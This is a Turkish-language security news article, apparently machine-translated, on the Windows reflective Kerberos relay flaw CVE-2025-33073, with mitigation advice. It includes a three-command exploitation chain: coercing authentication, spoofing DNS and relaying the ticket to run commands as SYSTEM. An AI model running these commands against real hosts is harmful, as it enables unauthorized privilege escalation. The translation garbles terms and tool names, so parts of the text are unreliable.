Yeni açıklanan bir güvenlik açığı olan CVE-2025-33073, “Yansıtıcı Kerberos Röle Saldırısı” olarak adlandırılan Windows güvenlik manzarasını sarstı.
Redteam Pentesting tarafından keşfedilen ve 10 Haziran 2025’te Microsoft tarafından yamalanan bu kusur, düşük privanged Active Directory kullanıcılarının SMB imzalamasını uygulamayan alana katılan Windows sistemlerinde NT Authority \ System’e ayrıcalıkları artırmasına izin verir.
Saldırı birkaç gelişmiş teknikten yararlanıyor:
.png
)
- Kimlik Doğrulama Baskı: Saldırgan, gibi araçları kullanarak
wspcoerceveyaNetExecbir Windows ana bilgisayarı zorlar (örneğin,client1) saldırgan tarafından kontrol edilen kötü niyetli bir SMB sunucusunun kimlik doğrulaması için. Bu, hedefi giden bir SMB bağlantısı başlatmaya zorlayan uzaktan prosedür çağrısı (RPC) API’leri ile elde edilir. - Servis Ana Adı (SPN) Karışıklık: Özel hazırlanmış bir ana bilgisayar adı kaydederek (örn.,
client11UWhRCA...YBAAAA) Active Directory DNS’de veya yerel ad çözünürlüğü gibi araçlarla sahtekarlıkpretendersaldırgan, verilen Kerberos biletinin, saldırganın sistemi değil, kurban sunucusunun kendisi için olmasını sağlar. - Kerberos Bilet Rölesi: Saldırgan, Kerberos servis biletini yakalar ve yamalı bir sürümünü kullanarak orijinal ana bilgisayara geri akar.
krbrelayx.pybilgisayar hesabı olarak kimlik doğrulaması (örneğin,client1$) SPN içincifs/client1. - Ayrıcalık yükseltme: Şaşırtıcı bir şekilde, düşük ayrıcalıklı bir oturum yerine, aktarılan kimlik doğrulama sistem düzeyinde erişim sağlar ve saldırganın keyfi komutlar yürütmesine izin verir
whoamive alnt authority\systemYanıt olarak.
Örnek Saldırı Komutları:
bash# Coerce authentication
$ wspcoerce 'lab.redteam/user1:Password@client1.lab.redteam' \
file:////client11UWhRCAAAA...YBAAAA/path
# Spoof DNS to redirect authentication
$ sudo pretender -i eth1 --no-dhcp-dns --no-timestamps \
--spoof '*1UWhRCAAAA...YBAAAA*'
# Relay Kerberos ticket and execute command
$ krbrelayx.py --target smb://client1.lab.redteam -c whoami
Sonuç: Hedef makinede sistem ayrıcalıkları.
Teknik analiz ve sömürü detayları
Güvenlik açığı Kerberos korumalarında bir boşluktan yararlanır.
NTLM röle saldırıları 2008 yılında MS08-068 tarafından hafifletilirken, Kerberos için benzer korumalar uygulanmadı.
Saldırı, Windows’un geri döngü kimlik doğrulaması ve SPN çözünürlüğünü ele alarak sistemi kötüye kullanır ve sistemi yapmaması gerektiğinde yüksek ayrıcalıklar vermeye karıştırır.
Anahtar teknik bileşenler şunları içerir:
- CredunmarshaltargetInfo/ccremantial_target_informationw hile: James Forshaw tarafından öncülük eden bu teknik, saldırganların zorlama hedefini SPN’den ayırmasına izin vererek bir saldırganın ev sahibine bağlanırken bile kurban için Kerberos biletlerinin verilmesine neden oluyor.
- NTLM önceliklendirmesini atlatma: Saldırganlar Değiştiriyor
krbrelayxNTLM’yi devre dışı bırakmak için Kerberos kimlik doğrulamasını zorlayarak. - Token Yeniden Kullanın Koşusu: Windows, bilgisayar hesabı ile kimlik doğrulaması yaparken sistem jetonunu yanlışlıkla yeniden kullanır ve bu da ayrıcalık artışına neden olur.
Risk değerlendirmesi ve azaltma
Risk önemlidir: Herhangi bir etki alanı kullanıcısı, SMB imzalamasının uygulanmadığı durumlarda, alana bağlı, etki alanı ile birleştirilmiş Windows ana bilgisayarlarında sistem ayrıcalıkları kazanabilir.
Saldırı, etki alanı denetleyicileri (SMB imzasının varsayılan olarak uygulandığı) hariç 2025 24H2’ye kadar desteklenen tüm Windows 10, 11 ve sunucu sürümlerini etkiler.
Risk faktörü tablosu
| Faktör | Risk seviyesi | Notalar |
|---|---|---|
| Ayrıcalık artışı | Eleştirel | Sistem düzeyinde erişim, tam uzaktan kod yürütme mümkün |
| Etkilenen sistemler | Yüksek | Domain tarafından birleştirilen tüm Windows 10, 11, Sunucu 2019-2025 (KOBİ imzalı DC’ler hariç) |
| Sömürü karmaşıklığı | Ilıman | Alan erişimi ve kimlik doğrulamasını zorlama yeteneği gerektirir |
| Varsayılan azaltma | Düşük | Çoğu istemci ve sunucuda varsayılan olarak uygulanmayan KOBİ imza |
| Yama müsaitliği | Yüksek | Patch 10 Haziran 2025’te yayınlandı (hemen başvurun) |
| Saldırı Önkoşulları | Ilıman | Saldırgan bir etki alanı kullanıcısı olmalı ve DNS ana bilgisayar adlarını kaydettirebilmeli veya parodi yapabilmelidir |
Azaltma Adımları:
- Microsoft’un Haziran 2025 güvenlik güncellemelerini hemen uygulayın.
- Yalnızca etki alanı denetleyicileri değil, tüm Windows ana bilgisayarlarında KOBİ imzalamayı zorlayın.
- Olağandışı KOBİ bağlantıları ve zorlama girişimlerini izleyin.
- Şüpheli ana bilgisayar adları için Active Directory DNS’yi inceleyin.
Yansıtıcı Kerberos röle saldırısı, eski protokoller aşamalı olarak olsa bile, katmanlı güvenlik ve uyanıklık ihtiyacını vurgular.
Organizasyonlar, bu kritik tehdide karşı çevrelerini yamalamak ve sertleştirmek için hızla hareket etmelidir.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin